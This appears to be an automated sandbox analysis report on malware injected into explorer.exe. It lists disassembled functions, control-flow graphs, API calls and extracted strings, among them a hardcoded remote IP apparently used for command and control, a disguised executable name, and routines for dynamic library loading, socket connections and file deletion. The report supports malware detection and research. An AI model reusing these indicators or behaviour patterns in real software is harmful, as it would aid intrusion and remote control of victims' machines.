                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$FreeThreadlstrlen$InitializeLocal$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken_errno_invalid_parameter_noinfo
                                                                            • String ID: "%s%s"$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 2779143808-50802693
                                                                            • Opcode ID: 0d84770a6eab9a6bc71060a5844aac5839e86231e41b5808e95897b3f8f885de
                                                                            • Instruction ID: 4eff2b895e7a218db1828d1d08894d6bf0170fa793b0aaa75bb062cda88406f9
                                                                            • Opcode Fuzzy Hash: 0d84770a6eab9a6bc71060a5844aac5839e86231e41b5808e95897b3f8f885de
                                                                            • Instruction Fuzzy Hash: 5F513C31114B8586F774DF60F858BEA33A5F798348F408626D95947AA4DF7DC68CCB00
                                                                            Function 00BF5A80 Relevance: 270.0, APIs: 66, Strings: 88, Instructions: 482memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 bf5a80-bf5aae call bef790 3 bf5ab4-bf5acf LocalAlloc 0->3 4 bf64a1 0->4 5 bf6496-bf649b LocalFree 3->5 6 bf5ad5-bf5af0 LocalAlloc 3->6 7 bf64a3-bf64a7 4->7 5->4 8 bf648b-bf6490 LocalFree 6->8 9 bf5af6-bf5afb 6->9 8->5 10 bf5afd-bf5b43 wnsprintfW * 2 9->10 11 bf5b48-bf5b4d 9->11 12 bf645f-bf6489 LocalFree 10->12 13 bf5b4f-bf5b95 wnsprintfW * 2 11->13 14 bf5b9a-bf5b9f 11->14 12->7 13->12 15 bf5bec-bf5bf1 14->15 16 bf5ba1-bf5be7 wnsprintfW * 2 14->16 17 bf5c3e-bf5c43 15->17 18 bf5bf3-bf5c39 wnsprintfW * 2 15->18 16->12 19 bf5c45-bf5c8b wnsprintfW * 2 17->19 20 bf5c90-bf5c95 17->20 18->12 19->12 21 bf5c97-bf5cdd wnsprintfW * 2 20->21 22 bf5ce2-bf5ce7 20->22 21->12 23 bf5ce9-bf5d2f wnsprintfW * 2 22->23 24 bf5d34-bf5d39 22->24 23->12 25 bf5d3b-bf5d81 wnsprintfW * 2 24->25 26 bf5d86-bf5d8b 24->26 25->12 27 bf5d8d-bf5dd3 wnsprintfW * 2 26->27 28 bf5dd8-bf5ddd 26->28 27->12 29 bf5ddf-bf5e25 wnsprintfW * 2 28->29 30 bf5e2a-bf5e2f 28->30 29->12 31 bf5e7c-bf5e81 30->31 32 bf5e31-bf5e77 wnsprintfW * 2 30->32 33 bf5ece-bf5ed3 31->33 34 bf5e83-bf5ec9 wnsprintfW * 2 31->34 32->12 35 bf5ed5-bf5f1b wnsprintfW * 2 33->35 36 bf5f20-bf5f25 33->36 34->12 35->12 37 bf5f27-bf5f6d wnsprintfW * 2 36->37 38 bf5f72-bf5f77 36->38 37->12 39 bf5f79-bf5fbf wnsprintfW * 2 38->39 40 bf5fc4-bf5fc9 38->40 39->12 41 bf5fcb-bf6011 wnsprintfW * 2 40->41 42 bf6016-bf601b 40->42 41->12 43 bf601d-bf6063 wnsprintfW * 2 42->43 44 bf6068-bf606d 42->44 43->12 45 bf606f-bf60b5 wnsprintfW * 2 44->45 46 bf60ba-bf60bf 44->46 45->12 47 bf610c-bf6111 46->47 48 bf60c1-bf6107 wnsprintfW * 2 46->48 49 bf615e-bf6163 47->49 50 bf6113-bf6159 wnsprintfW * 2 47->50 48->12 51 bf6165-bf61ab wnsprintfW * 2 49->51 52 bf61b0-bf61b5 49->52 50->12 51->12 53 bf61b7-bf61fd wnsprintfW * 2 52->53 54 bf6202-bf6207 52->54 53->12 55 bf6209-bf624f wnsprintfW * 2 54->55 56 bf6254-bf6259 54->56 55->12 57 bf625b-bf62a1 wnsprintfW * 2 56->57 58 bf62a6-bf62ab 56->58 57->12 59 bf62ad-bf62f3 wnsprintfW * 2 58->59 60 bf62f8-bf62fd 58->60 59->12 61 bf62ff-bf6345 wnsprintfW * 2 60->61 62 bf634a-bf634f 60->62 61->12 63 bf639c-bf63a1 62->63 64 bf6351-bf6397 wnsprintfW * 2 62->64 65 bf63eb-bf63f0 63->65 66 bf63a3-bf63e9 wnsprintfW * 2 63->66 64->12 67 bf643a-bf645d LocalFree * 3 65->67 68 bf63f2-bf6438 wnsprintfW * 2 65->68 66->12 67->7 68->12
                                                                            APIs
                                                                              • Part of subcall function 00BEF790: SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7AF
                                                                              • Part of subcall function 00BEF790: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00BF67C4), ref: 00BEF7C3
                                                                              • Part of subcall function 00BEF790: wnsprintfW.SHLWAPI ref: 00BEF7FC
                                                                              • Part of subcall function 00BEF790: lstrlenW.KERNEL32 ref: 00BEF80B
                                                                              • Part of subcall function 00BEF790: CoTaskMemFree.COMBASE ref: 00BEF81D
                                                                            • LocalAlloc.KERNEL32 ref: 00BF5ABE
                                                                            • LocalAlloc.KERNEL32 ref: 00BF5ADF
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B1F
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B3D
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B71
                                                                            • wnsprintfW.SHLWAPI ref: 00BF5B8F
                                                                            • LocalFree.KERNELBASE ref: 00BF6464
                                                                            • LocalFree.KERNEL32 ref: 00BF6490
                                                                            • LocalFree.KERNEL32 ref: 00BF649B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$wnsprintf$Free$Alloc$FolderKnownPathTasklstrlen
                                                                            • String ID: #$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL${01754A97-03F0-4626-BD2F-65C262CF4822}${02AAA0F1-549D-4514-A4C3-95769216EF86}${1A2C41FD-4110-4F27-A10A-F40FD520BF68}${22C965B7-04E5-4E21-B8C4-B23C6271EACC}${267AF3B6-7071-4851-B22B-4AD370C52995}${322D94F7-E188-44AD-BDAC-485C2607E49E}${351938E8-B1AE-4FF2-95B5-72821EC3026E}${4C60DA55-7BB8-4813-8661-DBAF26ED5DDE}${54744527-B32C-4D4D-A9E3-D7E04DACB3AF}${5D8760B5-DAFB-4059-9834-9879CAFA6E82}${63B3A1F3-F80F-45D9-8E3B-1C472D5D377A}${6C63B107-24D4-4657-9C6F-3E6336B91826}${6DE815D9-D711-4997-A495-CDF197C7B0D5}${6E676E15-E52D-4657-AD2B-2A593D6FDEFA}${7D78FC1D-661D-4F16-9CFD-BF2C482A86F5}${AAB40134-7579-406F-A83C-C9AB59AED6B3}${AB57ED28-7260-47FC-94FE-1ACD18BCF184}${B1FD7D9B-73A6-403D-8CE3-BD0AFB53E584}${B74D3F84-962E-48AE-A294-59C38EC7BF8D}${C070FC6A-5402-4558-99DF-C4D535E5D5B3}${C37212ED-321A-4629-8304-896FF9538ADC}${D44F28D3-E957-4DE1-A698-C851510460AD}${D68F034E-E0AB-4164-9244-39533778D3BB}${D7FE6321-139C-483C-8028-3587F9A0C15D}${D956794B-CFE9-4CA2-8079-D88118C4F650}${E1D8BC43-6A0D-443E-B57F-879297CD2924}${EF12D25B-2143-4AA1-B8F6-D3762EA7E9E0}${EFC4C27F-0DB6-49D7-A189-EE4E067A0483}${F1FBA124-1995-4C35-A87B-7D27BEA83B72}
                                                                            • API String ID: 1623426732-942114945
                                                                            • Opcode ID: 1394f4a21a88887c0b01a774efa77418e060bfd3e5fa76cf7218aff6abc0ee23
                                                                            • Instruction ID: c9289dfb094d6d3a91d53dc7978651e5e42ac52d847dcaccf0d43109c5642b80
                                                                            • Opcode Fuzzy Hash: 1394f4a21a88887c0b01a774efa77418e060bfd3e5fa76cf7218aff6abc0ee23
                                                                            • Instruction Fuzzy Hash: 2A52E935119A8AD6FB50EF55E850BA973B1F7C5744F500222EA8E03BA8CF3DD94ACB41
                                                                            Function 00BF87C0 Relevance: 119.9, APIs: 51, Strings: 17, Instructions: 909libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL
                                                                            • API String ID: 2574300362-2969658442
                                                                            • Opcode ID: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                            • Instruction ID: 4d609c820a2e65a527567f32eb1dcbebc09a9ab9f43f9df2d63ea6210d1fa629
                                                                            • Opcode Fuzzy Hash: b00bce88697c7525284cc10c94eef30e1ae8b74fc276d152b0c34e2d56b66801
                                                                            • Instruction Fuzzy Hash: 5BB2E236219B89D5EB30CB14E4947BAB3A0F7D9B45F500526CB8E83B69DF39C589CB01
                                                                            Function 00C06370 Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 439synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 435 c06370-c06404 call c01f90 * 2 440 c0640f-c06416 435->440 441 c0641c-c06431 WaitForSingleObject 440->441 442 c06b7f-c06b94 WaitForSingleObject 440->442 441->442 443 c06437-c0645c 441->443 444 c06b96-c06b9d 442->444 445 c06b9f 442->445 451 c067e2-c06809 WaitForMultipleObjects 443->451 452 c06462-c06469 443->452 444->445 447 c06ba9-c06bb4 444->447 445->447 448 c06cab-c06cb6 445->448 449 c06bc6-c06bce 447->449 450 c06cc8-c06cd0 448->450 453 c06bd4-c06be5 449->453 454 c06c6e-c06c77 449->454 455 c06d70-c06d79 450->455 456 c06cd6-c06ce7 450->456 459 c06815 451->459 460 c0680b-c06813 451->460 457 c06482 452->457 458 c0646b-c06480 WaitForSingleObject 452->458 463 c06be7-c06c20 shutdown closesocket 453->463 464 c06c2c-c06c3d 453->464 468 c06ca6 454->468 469 c06c79-c06c9a shutdown closesocket 454->469 461 c06da8-c06dbf LocalFree 455->461 462 c06d7b-c06d9c shutdown closesocket 455->462 465 c06ce9-c06d22 shutdown closesocket 456->465 466 c06d2e-c06d3f 456->466 457->448 458->457 467 c0648c-c0649d 458->467 459->448 460->459 470 c0681f-c06827 460->470 462->461 463->464 473 c06c69 464->473 474 c06c3f-c06c60 CloseHandle 464->474 465->466 475 c06d41-c06d62 CloseHandle 466->475 476 c06d6b 466->476 477 c064a3-c064aa 467->477 478 c067dd 467->478 468->440 468->448 469->468 471 c06833-c0683a 470->471 472 c06829 470->472 481 c06846-c0686b 471->481 482 c0683c 471->482 472->447 473->449 474->473 475->476 476->450 483 c064c3 477->483 484 c064ac-c064c1 WaitForSingleObject 477->484 478->451 487 c06871-c06878 481->487 488 c06b7a 481->488 482->447 483->451 484->483 485 c064c8-c06531 call c03b40 484->485 494 c06537-c0657c setsockopt 485->494 495 c067cd-c067d6 485->495 490 c0687a-c0688c WaitForSingleObject 487->490 491 c0688e 487->491 488->440 490->491 493 c06898-c068b5 WaitForSingleObject 490->493 491->448 498 c06b75 493->498 499 c068bb-c068eb WSAEnumNetworkEvents 493->499 496 c06582-c065b8 setsockopt 494->496 497 c067ac-c067c7 shutdown closesocket 494->497 495->478 496->497 500 c065be-c06605 call c04c90 496->500 497->495 498->488 501 c068f1-c068fd 499->501 502 c06b06-c06b6c shutdown closesocket CloseHandle 499->502 500->497 509 c0660b-c06653 call c04740 500->509 504 c06973-c0697f 501->504 505 c068ff-c0696e shutdown closesocket CloseHandle 501->505 502->498 507 c06b04 504->507 508 c06985-c069bd recv 504->508 505->507 507->498 510 c069c3-c069e2 call c02660 508->510 511 c06a95-c06afb shutdown closesocket CloseHandle 508->511 509->497 518 c06659-c06661 509->518 516 c06a24-c06a8a shutdown closesocket CloseHandle 510->516 517 c069e4-c06a22 CloseHandle 510->517 511->507 519 c06a93 516->519 517->519 518->497 520 c06667-c066ba call c04c90 518->520 519->507 520->497 523 c066c0-c06708 call c04740 520->523 523->497 526 c0670e-c06716 523->526 526->497 527 c0671c-c06733 WSACreateEvent 526->527 527->497 528 c06735-c06753 WSAEventSelect 527->528 529 c06755-c06780 528->529 530 c0678a-c067a3 CloseHandle 528->530 529->530 530->497
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$ObjectSingle$closesocketshutdown$CloseFreeHandleLocalMultipleObjects
                                                                            • String ID: 185.157.162.216$8
                                                                            • API String ID: 3117981272-403147771
                                                                            • Opcode ID: 23e456067cab4518c9824daf8a1b515705ab3926eae3887a8c2cc2d171e48651
                                                                            • Instruction ID: cd2640a05a1fa3c9413a8e0d73509cfd3a284371dd6e1e9d490cead1d19276f7
                                                                            • Opcode Fuzzy Hash: 23e456067cab4518c9824daf8a1b515705ab3926eae3887a8c2cc2d171e48651
                                                                            • Instruction Fuzzy Hash: EA32B632218A84C6E7719F15E8987DAB361F7C8759F604215DAC987BA8CF7DC558CB00
                                                                            Function 00C03B40 Relevance: 61.8, APIs: 41, Instructions: 306networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 531 c03b40-c03b7b socket 532 c03b84-c03b9b WSAGetLastError WSACreateEvent 531->532 533 c03b7d-c03b7f 531->533 535 c03ba7-c03bbf WSAEventSelect 532->535 536 c03b9d 532->536 534 c04199-c041a0 533->534 538 c03bc1 535->538 539 c03bcb-c03bd5 535->539 537 c0417c-c04197 shutdown closesocket 536->537 537->534 540 c04171-c04176 CloseHandle 538->540 541 c03bdb-c03be5 539->541 542 c03dee-c03e03 539->542 540->537 543 c03bf4-c03c0b inet_addr 541->543 544 c03be7-c03bf2 541->544 545 c03e15-c03e32 inet_addr 542->545 546 c03e05-c03e13 542->546 549 c03c46-c03c84 htons connect 543->549 550 c03c0d-c03c26 gethostbyname 543->550 544->549 547 c03e79-c03ec6 htons connect 545->547 548 c03e34-c03e53 gethostbyname 545->548 546->547 547->540 553 c03ecc-c03ed7 WSAGetLastError 547->553 551 c03e55-c03e6d 548->551 552 c03e6f 548->552 556 c03de9 549->556 557 c03c8a-c03c95 WSAGetLastError 549->557 554 c03c28-c03c3a 550->554 555 c03c3c 550->555 551->547 552->540 553->540 558 c03edd-c03efe 553->558 554->549 555->540 556->540 557->556 559 c03c9b-c03cb6 557->559 560 c03f20-c03f57 WSAWaitForMultipleEvents 558->560 561 c03f00-c03f19 558->561 562 c03cb8-c03ccb 559->562 563 c03ccf-c03cfa WSAWaitForMultipleEvents 559->563 566 c03f70-c03f88 WSACloseEvent closesocket 560->566 567 c03f59-c03f64 560->567 561->560 562->563 564 c03d19-c03d21 563->564 565 c03cfc-c03d14 WSACloseEvent closesocket 563->565 568 c03d40-c03d45 564->568 569 c03d23-c03d3b WSACloseEvent closesocket 564->569 565->534 566->534 567->566 570 c03f66-c03f6e 567->570 571 c03dc5-c03dca 568->571 572 c03d47-c03d5e WSAEnumNetworkEvents 568->572 569->534 570->566 573 c03f8d-c03f95 570->573 571->556 576 c03dcc-c03de4 closesocket WSACloseEvent 571->576 574 c03d60-c03d78 closesocket WSACloseEvent 572->574 575 c03d7d-c03d86 572->575 573->540 577 c03f9b-c03fb5 WSAEnumNetworkEvents 573->577 574->534 578 c03da5-c03dae 575->578 579 c03d88-c03da0 closesocket WSACloseEvent 575->579 576->534 580 c03fd4-c03fdc 577->580 581 c03fb7-c03fcf WSACloseEvent closesocket 577->581 578->571 584 c03db0-c03dc0 WSACloseEvent 578->584 579->534 582 c03ffb-c04005 580->582 583 c03fde-c03ff6 WSACloseEvent closesocket 580->583 581->534 585 c04022-c0403f inet_addr 582->585 586 c04007-c04020 582->586 583->534 584->534 588 c04041-c0404c 585->588 589 c0404e 585->589 587 c04059-c04061 586->587 590 c04067-c040ce call c041b0 587->590 591 c040ea-c040f2 587->591 588->587 589->587 596 c040d0-c040e0 CloseHandle 590->596 597 c040e5 590->597 591->540 593 c040f4-c0415d call c04340 591->593 593->540 599 c0415f-c0416f CloseHandle 593->599 596->534 597->540 599->534 599->540
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorEventLastclosesocketshutdownsocket
                                                                            • String ID:
                                                                            • API String ID: 1739004367-0
                                                                            • Opcode ID: 312400b61dce4a0ed8e768a3da5f999724be7ff5feccfe21ec1dd019f5c2e3e1
                                                                            • Instruction ID: a0d87f251789d4aa9e0409219af9daf5ac6f5353ed47181bd9d78eb958420fc1
                                                                            • Opcode Fuzzy Hash: 312400b61dce4a0ed8e768a3da5f999724be7ff5feccfe21ec1dd019f5c2e3e1
                                                                            • Instruction Fuzzy Hash: 8AF1B976218AC0C6E7749B15E85479FB7B4F788B94F101616EB9A86BA8DF3CC584CF00
                                                                            Function 00BFD590 Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 226librarymemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 667 bfd590-bfd5e8 OpenMutexW LoadLibraryW LocalAlloc 668 bfd5ea 667->668 669 bfd5f4-bfd609 GetModuleFileNameW 667->669 670 bfd978-bfd993 call be1860 call be4140 call be4560 call be5290 call bf7910 668->670 671 bfd60b 669->671 672 bfd615-bfd631 call c01e10 669->672 698 bfd99d-bfd9aa call c024e0 670->698 699 bfd995-bfd997 ExitProcess 670->699 671->670 678 bfd638-bfd66e OpenMutexW 672->678 679 bfd633 672->679 682 bfd67a-bfd681 call be17c0 678->682 683 bfd670 678->683 681 bfda1b-bfda22 679->681 689 bfd68d-bfd694 call be4050 682->689 690 bfd683 682->690 683->670 696 bfd696 689->696 697 bfd6a0-bfd6a7 call bf78a0 689->697 690->670 696->670 703 bfd6a9 697->703 704 bfd6b3-bfd6ba call bf3a60 697->704 707 bfd9ac-bfd9b3 CloseHandle 698->707 708 bfd9b9-bfd9bf 698->708 703->670 714 bfd6bc 704->714 715 bfd6c6-bfd6cd call c02210 704->715 707->708 710 bfd9cc-bfd9e8 708->710 711 bfd9c1-bfd9c6 CloseHandle 708->711 712 bfd9ea-bfd9f1 CloseHandle 710->712 713 bfd9f7-bfd9fd 710->713 711->710 712->713 716 bfd9ff-bfda04 LocalFree 713->716 717 bfda0a-bfda11 713->717 714->670 721 bfd6cf 715->721 722 bfd6d9-bfd6e0 call be5230 715->722 716->717 717->681 719 bfda13-bfda15 ExitProcess 717->719 721->670 725 bfd6ec-bfd6f3 call be44b0 722->725 726 bfd6e2 722->726 729 bfd6ff-bfd718 call be9c50 725->729 730 bfd6f5 725->730 726->670 733 bfd71a-bfd739 CreateMutexExW 729->733 734 bfd748-bfd764 call bfe280 call be9d70 729->734 730->670 735 bfd73b 733->735 736 bfd740 733->736 741 bfd766-bfd785 CreateMutexW 734->741 742 bfd794-bfd7b0 call bfe280 call be9e90 734->742 735->681 736->734 744 bfd78c 741->744 745 bfd787 741->745 749 bfd7b2-bfd7d1 CreateMutexW 742->749 750 bfd7e0-bfd7f3 call bfe280 742->750 744->742 745->681 751 bfd7d8 749->751 752 bfd7d3 749->752 755 bfd7f9-bfd800 750->755 756 bfd8f2-bfd8f9 750->756 751->750 752->681 755->756 759 bfd806-bfd80b 755->759 757 bfd8fb-bfd90d WaitForSingleObject 756->757 758 bfd911-bfd918 756->758 757->670 760 bfd91a-bfd925 758->760 761 bfd927 758->761 762 bfd80d-bfd812 759->762 763 bfd81b 759->763 765 bfd932-bfd972 WaitForMultipleObjects SetEvent 760->765 761->765 762->763 766 bfd814-bfd819 762->766 764 bfd826-bfd82e 763->764 767 bfd856-bfd85d 764->767 768 bfd830 call befa60 764->768 765->670 766->763 766->767 767->756 770 bfd863-bfd885 call be7770 767->770 771 bfd835-bfd837 768->771 770->756 775 bfd887 770->775 771->767 773 bfd839-bfd854 Sleep 771->773 773->764 776 bfd892-bfd8a3 GetFileAttributesW 775->776 777 bfd8a5-bfd8b5 DeleteFileW 776->777 778 bfd8e4-bfd8ec LocalFree 776->778 779 bfd8b7-bfd8cf 777->779 780 bfd8e0 777->780 778->756 781 bfd8d3-bfd8de SleepEx 779->781 782 bfd8d1 779->782 780->778 783 bfd8e2 781->783 782->778 783->776
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32 ref: 00BFD5A5
                                                                            • LoadLibraryW.KERNEL32 ref: 00BFD5B9
                                                                            • LocalAlloc.KERNEL32 ref: 00BFD5D7
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BFD601
                                                                            • ExitProcess.KERNEL32 ref: 00BFD997
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C024FF
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C0251B
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C02532
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C02549
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C02565
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C0257C
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C02593
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C025AA
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C025C6
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C025DD
                                                                              • Part of subcall function 00C024E0: SetEvent.KERNEL32 ref: 00C025F4
                                                                              • Part of subcall function 00C024E0: WaitForSingleObject.KERNEL32 ref: 00C02610
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C02627
                                                                              • Part of subcall function 00C024E0: CloseHandle.KERNEL32 ref: 00C0263E
                                                                            • CloseHandle.KERNEL32 ref: 00BFD9B3
                                                                            • CloseHandle.KERNEL32 ref: 00BFD9C6
                                                                            • CloseHandle.KERNEL32 ref: 00BFD9F1
                                                                            • LocalFree.KERNEL32 ref: 00BFDA04
                                                                            • ExitProcess.KERNEL32 ref: 00BFDA15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
